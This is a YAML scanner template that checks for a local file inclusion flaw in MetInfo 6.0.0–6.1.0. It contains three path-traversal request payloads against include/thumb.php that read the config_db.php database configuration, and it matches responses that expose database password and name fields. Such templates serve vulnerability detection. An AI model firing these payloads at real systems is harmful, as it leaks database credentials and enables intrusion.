id: metinfo-lfi

info:
  name: MetInfo <=6.1.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
  reference:
    - https://paper.seebug.org/676/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: metinfo,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "con_db_pass"
          - "con_db_name"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
